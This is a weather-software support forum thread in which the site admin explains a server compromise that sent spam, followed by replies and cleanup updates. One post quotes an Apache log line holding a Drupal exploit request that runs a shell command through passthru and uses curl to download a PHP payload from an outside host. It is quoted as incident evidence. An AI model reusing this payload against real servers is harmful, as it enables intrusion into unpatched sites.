Welcome to the new home of the Cumulus Support forum.

Latest Cumulus release v1.9.4 (build 1099) - Nov 28 2014
Latest Cumulus MX release - v3.0.0 build 3044 7 December 2018. See the Wiki for download

Site going down.

Talk about anything that doesn't fit elsewhere - PLEASE don't put Cumulus queries in here!
User avatar
ConligWX
Posts: 736
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis Vantage Pro2 Plus
Operating System: MeteoBridge Nano SD
Location: Bangor, NI
Contact:

Re: Site going down.

Post by ConligWX » Tue 09 Oct 2018 8:19 pm

Lets hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon

https://www.conligwx.org
https://twitter.com/conligwx
Davis Vantage Pro2 Plus - Meteobrige Nano SD + Saratoga/PWS Templates

Matt.j5b
Posts: 436
Joined: Mon 28 Nov 2011 2:13 am
Weather Station: Davis VP2 DFARS+La Crosse WS2306
Operating System: Windows 10 64 Bit
Location: Ferny Grove, Brisbane, Australia
Contact:

Re: Site going down.

Post by Matt.j5b » Tue 09 Oct 2018 8:36 pm

It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday. :)
Regards, Matt of Brisbane, Australia
Ferny Grove Weather
Cumulus MX testing

jlmr731
Posts: 118
Joined: Sat 27 Aug 2016 12:11 am
Weather Station: Davis vantage pro 2
Operating System: Debian
Location: Youngstown, Ohio
Contact:

Re: Site going down.

Post by jlmr731 » Wed 10 Oct 2018 2:19 am

Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for.
May be helpful for other's to know what to do if they have this problem to stop these script kiddies.

Thanks Steve for your hard work getting this problem resolved while on holiday.

User avatar
steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve » Wed 10 Oct 2018 2:58 pm

I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability;

85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"

I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.

It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
Steve

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot » Wed 10 Oct 2018 4:05 pm

Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
Cheers,
Ray, Cheshire.

Image

User avatar
steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve » Wed 10 Oct 2018 4:54 pm

I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot » Wed 10 Oct 2018 9:54 pm

Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken. :clap:
Cheers,
Ray, Cheshire.

Image

User avatar
hornychz
Posts: 7
Joined: Mon 11 May 2015 3:54 pm
Weather Station: WeatherDuino Pro2
Operating System: Raspbian Wheezy
Location: Brandys nad Labem - Stara Boleslav, Czech republic
Contact:

Re: Site going down.

Post by hornychz » Thu 11 Oct 2018 8:11 am

:clap: :)

User avatar
ConligWX
Posts: 736
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis Vantage Pro2 Plus
Operating System: MeteoBridge Nano SD
Location: Bangor, NI
Contact:

Re: Site going down.

Post by ConligWX » Thu 11 Oct 2018 11:34 am

It sounds like more a php injection vulnerability than linux itself being hacked. php CMS's are plagued with security holes and by only updating them when updates are released can you try to secure a site.

Steve, on that note you would be advised to update phpBB. your running a version that needs updated ;)

pm sent...
Regards Simon

https://www.conligwx.org
https://twitter.com/conligwx
Davis Vantage Pro2 Plus - Meteobrige Nano SD + Saratoga/PWS Templates

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot » Thu 11 Oct 2018 12:00 pm

Not sure if this related or not but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
Cheers,
Ray, Cheshire.

Image

User avatar
steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve » Thu 11 Oct 2018 1:05 pm

I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!

At some point I may look into getting a proper certificate, now that they can be had for free.

(Short answer: no :) )
Steve

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot » Thu 11 Oct 2018 3:45 pm

Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two! :D
Cheers,
Ray, Cheshire.

Image

User avatar
steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve » Mon 15 Oct 2018 2:41 pm

The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.

I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve

User avatar
saratogaWX
Posts: 912
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Site going down.

Post by saratogaWX » Mon 15 Oct 2018 4:21 pm

Ouch. I’ll be glad to analyze the logs again, Steve.

Best regards,
Ken

User avatar
steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve » Mon 15 Oct 2018 4:29 pm

Thanks, Ken, when I get chance I’ll zip them up for you.
Steve

Post Reply